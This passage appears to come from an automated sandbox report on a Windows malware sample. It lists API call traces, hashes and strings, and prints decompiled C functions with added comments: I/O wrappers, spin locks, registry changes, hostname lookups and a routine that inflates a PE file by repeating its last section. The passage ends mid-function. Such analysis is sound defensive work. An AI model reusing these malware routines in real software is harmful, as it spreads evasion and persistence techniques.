                                                                                • Opcode Fuzzy Hash: 72ec9626f1a57597f212d5c6e724b1b36c6131d7c0d684d5184da94b21603b05
                                                                                • Instruction Fuzzy Hash: 2F218071A00219BBDF209FA6EC89EDF7F79EF08754F008072F904A6190E6718A64DB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00E3421F
                                                                                • GetLastError.KERNEL32 ref: 00E34229
                                                                                • WaitForSingleObject.KERNEL32(?,?), ref: 00E3423A
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E3424D
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                • String ID:
                                                                                • API String ID: 888215731-0
                                                                                • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                • Instruction ID: 31aadcf23ffd6d76fb4b80549621a4c06a1af020a9d1a1545e27535356c98ee7
                                                                                • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                • Instruction Fuzzy Hash: A801A5B2511109ABDF01DF90ED88BEF7BACEB08355F118461F901F20A0D7B4AA54DBB6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00E341AB
                                                                                • GetLastError.KERNEL32 ref: 00E341B5
                                                                                • WaitForSingleObject.KERNEL32(?,?), ref: 00E341C6
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E341D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                • String ID:
                                                                                • API String ID: 3373104450-0
                                                                                • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                • Instruction ID: e773c0339115b822e96994f46ec3d8958a33fc73bb8bdfa24e79fc7d05bb70a9
                                                                                • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                • Instruction Fuzzy Hash: 7B01A97651250AABDF01DF91ED88BEE7B6CEB18359F104061F901E2090D774AA94CBB5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00403F18(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
                                                                                				struct _OVERLAPPED _v24;
                                                                                				long _t30;
                                                                                				void* _t31;
                                                                                
                                                                                				_v24.Offset = _v24.Offset & 0x00000000;
                                                                                				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
                                                                                				_t30 = _a12;
                                                                                				_t31 = _a16;
                                                                                				_a16 = _a16 & 0x00000000;
                                                                                				_v24.hEvent = _t31;
                                                                                				if(WriteFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
                                                                                					L3:
                                                                                					if(_t30 != _a16) {
                                                                                						L5:
                                                                                						return 0;
                                                                                					}
                                                                                					return 1;
                                                                                				}
                                                                                				if(GetLastError() != 0x3e5) {
                                                                                					goto L5;
                                                                                				}
                                                                                				WaitForSingleObject(_t31, _a20);
                                                                                				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
                                                                                					goto L5;
                                                                                				}
                                                                                				goto L3;
                                                                                			}

                                                                                APIs
                                                                                • WriteFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403F44
                                                                                • GetLastError.KERNEL32 ref: 00403F4E
                                                                                • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403F5F
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F72
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                • String ID:
                                                                                • API String ID: 3373104450-0
                                                                                • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                • Instruction ID: 81d5a9f64dfd66904774ebc82d2e0e48c629fa8216d99cd76bf4a5dbd4e59073
                                                                                • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                • Instruction Fuzzy Hash: B9010C7291110AABDF01DF90ED44BEF7B7CEB08356F104066FA01E2190D774DA558BB6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                 			E00403F8C(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
                                                                                 				/* Overlapped ReadFile wrapper: reads _a12 bytes from handle _a4 into _a8.
                                                                                 				   _a16 carries the event handle in and the byte count out; _a20 is the wait timeout.
                                                                                 				   Returns 1 only when exactly _a12 bytes were read, 0 on any error or short read. */
                                                                                 				struct _OVERLAPPED _v24;
                                                                                 				long _t30;
                                                                                 				void* _t31;
                                                                                 
                                                                                 				_v24.Offset = _v24.Offset & 0x00000000;
                                                                                 				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
                                                                                 				_t30 = _a12;
                                                                                 				_t31 = _a16;
                                                                                 				_a16 = _a16 & 0x00000000;
                                                                                 				_v24.hEvent = _t31;
                                                                                 				if(ReadFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
                                                                                 					L3:
                                                                                 					if(_t30 != _a16) {
                                                                                 						L5:
                                                                                 						return 0;
                                                                                 					}
                                                                                 					return 1;
                                                                                 				}
                                                                                 				if(GetLastError() != 0x3e5) {   /* 0x3e5 == ERROR_IO_PENDING: the read is still in flight */
                                                                                 					goto L5;
                                                                                 				}
                                                                                 				WaitForSingleObject(_t31, _a20);
                                                                                 				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
                                                                                 					goto L5;
                                                                                 				}
                                                                                 				goto L3;
                                                                                 			}

                                                                                 Instruction addresses: 0x00403f92, 0x00403f96, 0x00403f9b, 0x00403f9f, 0x00403fa2, 0x00403fb2, 0x00403fc0, 0x00403ff0, 0x00403ff3, 0x00403ffa, 0x00000000, 0x00403ffa, 0x00000000, 0x00403ff7, 0x00403fcd, 0x00000000, 0x00000000, 0x00403fd3, 0x00403fee, 0x00000000, 0x00000000, 0x00000000

                                                                                APIs
                                                                                • ReadFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403FB8
                                                                                • GetLastError.KERNEL32 ref: 00403FC2
                                                                                • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403FD3
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403FE6
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                • String ID:
                                                                                • API String ID: 888215731-0
                                                                                • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                • Instruction ID: 44fd539f7a3468c5635e20a1652967c761b46accf60e77792ab8a53432005efc
                                                                                • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                • Instruction Fuzzy Hash: A601177291110AAFDF01DF90ED45BEF3B7CEF08356F004062F906E2090D7749A549BA6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • lstrcmp.KERNEL32(?,80000009), ref: 00E3E066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmp
                                                                                • String ID: A$ A$ A
                                                                                • API String ID: 1534048567-1846390581
                                                                                • Opcode ID: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
                                                                                • Instruction ID: 55cc539650e3c77db28cbe46135054de3d2e6e6061da3a792a71d2ad6b8d9f3d
                                                                                • Opcode Fuzzy Hash: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
                                                                                • Instruction Fuzzy Hash: 5BF06231200702DBCB24CF25D888A92BBE9FB05325F44862AE164E32A0D3B5E898CF51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                 			E0040A4C7(intOrPtr _a4) {
                                                                                 				/* Spin-lock acquire on the LONG at offset 0x5c of the object _a4.
                                                                                 				   InterlockedExchange returns the previous value, so 0 means the lock was free and is now held.
                                                                                 				   Gives up after 0x1388 (5000) ms of GetTickCount time; returns 0 on success, the elapsed time on timeout. */
                                                                                 				long _t3;
                                                                                 				LONG* _t8;
                                                                                 				long _t9;
                                                                                 
                                                                                 				_t9 = GetTickCount();
                                                                                 				_t8 = _a4 + 0x5c;
                                                                                 				while(1) {
                                                                                 					_t3 = InterlockedExchange(_t8, 1);
                                                                                 					if(_t3 == 0) {
                                                                                 						break;
                                                                                 					}
                                                                                 					_t3 = GetTickCount() - _t9;
                                                                                 					if(_t3 < 0x1388) {
                                                                                 						Sleep(0);   /* yield the time slice and retry */
                                                                                 						continue;
                                                                                 					}
                                                                                 					break;
                                                                                 				}
                                                                                 				return _t3;
                                                                                 			}

                                                                                 Instruction addresses: 0x0040a4dd, 0x0040a4df, 0x0040a4f7, 0x0040a4fa, 0x0040a4fe, 0x00000000, 0x00000000, 0x0040a4e6, 0x0040a4ed, 0x0040a4f1, 0x00000000, 0x0040a4f1, 0x00000000, 0x0040a4ed, 0x0040a504

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                • GetTickCount.KERNEL32 ref: 0040A4E4
                                                                                • Sleep.KERNEL32(00000000,?,0040C2E9,0040C4E0,00000000,localcfg,?,0040C4E0,00413588,00408810), ref: 0040A4F1
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                • Instruction ID: a5473328a7e7118e9aede6741b06156156ec1e7733dd8d1ec56465b12724d56e
                                                                                • Opcode Fuzzy Hash: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                • Instruction Fuzzy Hash: 7DE0863720131567C6005BA5BD84FAA7B98AB4D761F164072FB08E3280D6AAA99145BF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                 			E00404E92(void* __ecx) {
                                                                                 				/* Spin-lock acquire on the LONG at offset 4 of the object in ECX (thiscall style).
                                                                                 				   Same pattern as E0040A4C7 but with a 0x2710 (10000) ms timeout and a 10 ms sleep between attempts.
                                                                                 				   Returns 0 on success, the elapsed time on timeout. */
                                                                                 				long _t2;
                                                                                 				void* _t7;
                                                                                 				LONG* _t8;
                                                                                 				long _t9;
                                                                                 
                                                                                 				_t7 = __ecx;
                                                                                 				_t9 = GetTickCount();
                                                                                 				_t8 = _t7 + 4;
                                                                                 				while(1) {
                                                                                 					_t2 = InterlockedExchange(_t8, 1);
                                                                                 					if(_t2 == 0) {
                                                                                 						break;
                                                                                 					}
                                                                                 					_t2 = GetTickCount() - _t9;
                                                                                 					if(_t2 < 0x2710) {
                                                                                 						Sleep(0xa);
                                                                                 						continue;
                                                                                 					}
                                                                                 					break;
                                                                                 				}
                                                                                 				return _t2;
                                                                                 			}

                                                                                 Instruction addresses: 0x00404e9c, 0x00404ea6, 0x00404ea8, 0x00404ec0, 0x00404ec3, 0x00404ec7, 0x00000000, 0x00000000, 0x00404eaf, 0x00404eb6, 0x00404eba, 0x00000000, 0x00404eba, 0x00000000, 0x00404eb6, 0x00404ecd

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00404E9E
                                                                                • GetTickCount.KERNEL32 ref: 00404EAD
                                                                                • Sleep.KERNEL32(0000000A,?,00000001), ref: 00404EBA
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 00404EC3
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                • Instruction ID: 0be737a4b1ecb403dd0b6a084e6b0260aeafc6613011e157a8d43e60cd200510
                                                                                • Opcode Fuzzy Hash: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                • Instruction Fuzzy Hash: 6AE086B620121457D61027B9FD84F966A89AB9A361F010532F70DE21C0C6AA989345FD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                 			E00404BD1(void* __ecx) {
                                                                                 				/* Spin-lock acquire on the LONG at offset 0xc of the object in ECX.
                                                                                 				   5000 ms (0x1388) timeout with Sleep(0) yields; returns 0 on success, the elapsed time on timeout. */
                                                                                 				long _t2;
                                                                                 				void* _t7;
                                                                                 				LONG* _t8;
                                                                                 				long _t9;
                                                                                 
                                                                                 				_t7 = __ecx;
                                                                                 				_t9 = GetTickCount();
                                                                                 				_t8 = _t7 + 0xc;
                                                                                 				while(1) {
                                                                                 					_t2 = InterlockedExchange(_t8, 1);
                                                                                 					if(_t2 == 0) {
                                                                                 						break;
                                                                                 					}
                                                                                 					_t2 = GetTickCount() - _t9;
                                                                                 					if(_t2 < 0x1388) {
                                                                                 						Sleep(0);
                                                                                 						continue;
                                                                                 					}
                                                                                 					break;
                                                                                 				}
                                                                                 				return _t2;
                                                                                 			}

                                                                                 Instruction addresses: 0x00404bdb, 0x00404be5, 0x00404be7, 0x00404bff, 0x00404c02, 0x00404c06, 0x00000000, 0x00000000, 0x00404bee, 0x00404bf5, 0x00404bf9, 0x00000000, 0x00404bf9, 0x00000000, 0x00404bf5, 0x00404c0c

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00404BDD
                                                                                • GetTickCount.KERNEL32 ref: 00404BEC
                                                                                • Sleep.KERNEL32(00000000,?,?,?,00000004,004050F2), ref: 00404BF9
                                                                                • InterlockedExchange.KERNEL32(-00000008,00000001), ref: 00404C02
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                • Instruction ID: c27c4130c4fb343c81443d6f5f76baf76a02980c1ff66e5fdc0d00212ab38f61
                                                                                • Opcode Fuzzy Hash: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                • Instruction Fuzzy Hash: FCE0867624521457D61027A66D80FA67BA89B99361F064073F70CE2190C9AAE48141BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                 			E004030FA(LONG* _a4) {
                                                                                 				/* Generic spin-lock acquire on the LONG pointed to by _a4.
                                                                                 				   5000 ms (0x1388) timeout with Sleep(0) yields; returns 0 on success, the elapsed time on timeout. */
                                                                                 				long _t3;
                                                                                 				long _t5;
                                                                                 
                                                                                 				_t5 = GetTickCount();
                                                                                 				while(1) {
                                                                                 					_t3 = InterlockedExchange(_a4, 1);
                                                                                 					if(_t3 == 0) {
                                                                                 						break;
                                                                                 					}
                                                                                 					_t3 = GetTickCount() - _t5;
                                                                                 					if(_t3 < 0x1388) {
                                                                                 						Sleep(0);
                                                                                 						continue;
                                                                                 					}
                                                                                 					break;
                                                                                 				}
                                                                                 				return _t3;
                                                                                 			}






                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00403103
                                                                                • GetTickCount.KERNEL32 ref: 0040310F
                                                                                • Sleep.KERNEL32(00000000), ref: 0040311C
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                • Instruction ID: 9edc608f4d32da9f9de986fa19dd3c9deb40157c310ade5cfb00ff6fe32d5b40
                                                                                • Opcode Fuzzy Hash: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                • Instruction Fuzzy Hash: 51E0C235200215ABDB00AF75BD44B8A6E9EDF8C762F014432F205EA1E0C9F44D51897A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • WriteFile.KERNEL32(00000001,D,00000000,00000000,00000000), ref: 00E3E470
                                                                                • CloseHandle.KERNEL32(00000001,00000003), ref: 00E3E484
                                                                                  • Part of subcall function 00E3E2FC: RegCreateKeyExA.ADVAPI32(80000001,00E3E50A,00000000,00000000,00000000,00020106,00000000,00E3E50A,00000000,000000E4), ref: 00E3E319
                                                                                  • Part of subcall function 00E3E2FC: RegSetValueExA.ADVAPI32(00E3E50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,004122F8), ref: 00E3E38E
                                                                                  • Part of subcall function 00E3E2FC: RegDeleteValueA.ADVAPI32(00E3E50A,?,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,D), ref: 00E3E3BF
                                                                                  • Part of subcall function 00E3E2FC: RegCloseKey.ADVAPI32(00E3E50A,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,D,00E3E50A), ref: 00E3E3C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseValue$CreateDeleteFileHandleWrite
                                                                                • String ID: D
                                                                                • API String ID: 4151426672-185221428
                                                                                • Opcode ID: f9347908c3accb151d66d4a2045a2710535659ff764f1ec32379916764927f64
                                                                                • Instruction ID: fdb1ed0cd741c5365b20823e30b6ad3aff76be11d3569c0aae0fc3c442738e5b
                                                                                • Opcode Fuzzy Hash: f9347908c3accb151d66d4a2045a2710535659ff764f1ec32379916764927f64
                                                                                • Instruction Fuzzy Hash: 3A41C971D00214BAEB206B558C4EFEB3F6CEF04728F149025FA19B42D2E7B58A50DAB5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?), ref: 00E383C6
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?), ref: 00E38477
                                                                                  • Part of subcall function 00E369C3: SetFileAttributesA.KERNEL32(?,00000080), ref: 00E369E5
                                                                                  • Part of subcall function 00E369C3: SetFileAttributesA.KERNEL32(?,00000002), ref: 00E36A26
                                                                                  • Part of subcall function 00E369C3: GetFileSize.KERNEL32(000000FF,00000000), ref: 00E36A3A
                                                                                  • Part of subcall function 00E3EE95: GetProcessHeap.KERNEL32(00000000,?,00000000,00E31DCF,?), ref: 00E3EEA8
                                                                                  • Part of subcall function 00E3EE95: HeapFree.KERNEL32(00000000), ref: 00E3EEAF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesHeap$CloseFreeOpenProcessSize
                                                                                • String ID: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe
                                                                                • API String ID: 359188348-2070294517
                                                                                • Opcode ID: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
                                                                                • Instruction ID: 3c9b9d6baa86c03e18f2d7425dbf78ad336ab399fce78202157b173c68648aa5
                                                                                • Opcode Fuzzy Hash: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
                                                                                • Instruction Fuzzy Hash: 774190B2800209BEEB10ABA09E89DFF7FBCEB04304F045466F554F2551FAB15A84CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 00E3AFFF
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E3B00D
                                                                                  • Part of subcall function 00E3AF6F: gethostname.WS2_32(?,00000080), ref: 00E3AF83
                                                                                  • Part of subcall function 00E3AF6F: lstrcpy.KERNEL32(?,00410B90), ref: 00E3AFE6
                                                                                  • Part of subcall function 00E3331C: gethostname.WS2_32(?,00000080), ref: 00E3333F
                                                                                  • Part of subcall function 00E3331C: gethostbyname.WS2_32(?), ref: 00E33349
                                                                                  • Part of subcall function 00E3AA0A: inet_ntoa.WS2_32(00000000), ref: 00E3AA10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                • String ID: %OUTLOOK_BND_
                                                                                • API String ID: 1981676241-3684217054
                                                                                • Opcode ID: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
                                                                                • Instruction ID: 93b8d904a295f1cf94f29f39ec600390bad415bbe38ab64af9a143b19210c0ee
                                                                                • Opcode Fuzzy Hash: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
                                                                                • Instruction Fuzzy Hash: E141127290420CABDB25EFA4DC4AEEF3BACFF44304F144426F925A2152EA75D654CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ShellExecuteA.SHELL32(00000000,00000000,00000020,00000022,00000000,00000000), ref: 00E39536
                                                                                • Sleep.KERNEL32(000001F4), ref: 00E3955D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShellSleep
                                                                                • String ID:
                                                                                • API String ID: 4194306370-3916222277
                                                                                • Opcode ID: 8ec43b0dbd72852d903c080b258003cf27e186f124a7becd1b7b46641cf4f594
                                                                                • Instruction ID: e1271d6d7dce32008ad668d4598b2aea50882290bb00b4aeec3750b8cd353418
                                                                                • Opcode Fuzzy Hash: 8ec43b0dbd72852d903c080b258003cf27e186f124a7becd1b7b46641cf4f594
                                                                                • Instruction Fuzzy Hash: 7E41E4719082847EEB379A68D88D7E63FE49B02318F1461E5D492B7193D7F44DC1C721
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 97%
                                                                                			E00406987(void* __ecx, void* _a4, void* _a8, intOrPtr _a12, signed int _a16) {
                                                                                				/* Writes the in-memory PE image _a8 to file handle _a4 while inflating
                                                                                				   the last section: everything before the last section's raw data is
                                                                                				   written once, then that section's raw data is written N times, with
                                                                                				   N = (_a16 - PointerToRawData) / SizeOfRawData (minimum 1), and the
                                                                                				   SizeOfRawData in the written header is patched to N * original so the
                                                                                				   output still parses as a PE. _a12 is compared against PointerToRawData
                                                                                				   and is assumed to be the length of the buffer; _a16 is the requested
                                                                                				   output size. Returns the number of bytes written, or 0 on a failed
                                                                                				   write. Offsets are those of IMAGE_NT_HEADERS / IMAGE_SECTION_HEADER. */
                                                                                				long _v8;	/* bytes written by each WriteFile */
                                                                                				long _v12;	/* original SizeOfRawData of the last section */
                                                                                				void* _t48;	/* IMAGE_NT_HEADERS (declaration omitted by the decompiler) */
                                                                                				signed int* _t7;	/* &_a16 (declaration omitted by the decompiler) */
                                                                                				signed int* _t20;	/* &_a16 (declaration omitted by the decompiler) */
                                                                                				signed int* _t41;	/* &_a16 (declaration omitted by the decompiler) */
                                                                                				signed int _t50;
                                                                                				signed int _t53;
                                                                                				int _t59;
                                                                                				signed int _t60;
                                                                                				long _t68;
                                                                                				signed int _t74;
                                                                                				void* _t78;
                                                                                				void* _t85;
                                                                                
                                                                                				_t78 = _a8;
                                                                                				_t48 =  *((intOrPtr*)(_t78 + 0x3c)) + _t78;	/* e_lfanew -> IMAGE_NT_HEADERS */
                                                                                				_t7 =  &_a16; // 0x406b2c
                                                                                				/* last IMAGE_SECTION_HEADER = NT headers + 0x18 + SizeOfOptionalHeader (+0x14)
                                                                                				   + (NumberOfSections (+6) - 1) * 0x28 */
                                                                                				_t85 = (( *( *((intOrPtr*)(_t78 + 0x3c)) + _t78 + 6) & 0x0000ffff) - 1) * 0x28 + ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
                                                                                				_t68 =  *(_t85 + 0x14);	/* PointerToRawData: size of everything before the last section */
                                                                                				_t50 =  *_t7 - _t68;	/* bytes of output still needed after that prefix */
                                                                                				_v8 = _t50;
                                                                                				if(_t68 >= _a12) {	/* last section starts past the buffer: no inflation */
                                                                                					L5:
                                                                                					_a16 = _a16 & 0x00000000;	/* repeat count = 0 */
                                                                                				} else {
                                                                                					_t74 =  *(_t85 + 0x10);	/* SizeOfRawData of the last section */
                                                                                					if(_t74 == 0) {
                                                                                						goto L5;
                                                                                					} else {
                                                                                						_v12 = _t74;
                                                                                						_a16 = _t50 / _t74;	/* repeat count N */
                                                                                						if(_a16 < 1) {
                                                                                							_a16 = 1;
                                                                                						}
                                                                                						_t20 =  &_a16; // 0x406b2c
                                                                                						 *(_t85 + 0x10) =  *_t20 * _t74;	/* patch SizeOfRawData = N * original before the headers are written */
                                                                                					}
                                                                                				}
                                                                                				_v8 = _v8 & 0x00000000;
                                                                                				/* write headers and all sections except the last (PointerToRawData bytes) */
                                                                                				if(WriteFile(_a4, _t78, _t68,  &_v8, 0) == 0 || _v8 != _t68) {
                                                                                					if(_a16 != 0) {
                                                                                						 *(_t85 + 0x10) = _v12;	/* restore the in-memory header */
                                                                                					}
                                                                                					_t53 = 0;
                                                                                				} else {
                                                                                					if(_a16 == 0) {
                                                                                						L13:
                                                                                						_t53 = _t68;
                                                                                					} else {
                                                                                						 *(_t85 + 0x10) = _v12;	/* restore in memory; the on-disk copy keeps the patched size */
                                                                                						while(1) {
                                                                                							_v8 = _v8 & 0x00000000;
                                                                                							/* append one copy of the last section's raw data */
